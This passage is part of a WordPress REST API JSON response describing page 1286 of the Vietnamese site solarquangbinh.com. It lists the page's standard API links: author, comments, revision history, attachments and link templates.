name=search_term_string"}],"inLanguage":"vi"}]}},"_links":{"self":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/pages\/1286"}],"collection":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/users\/318"}],"replies":[{"embeddable":true,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1286"}],"version-history":[{"count":33,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/pages\/1286\/revisions"}],"predecessor-version":[{"id":3596,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/pages\/1286\/revisions\/3596"}],"wp:attachment":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}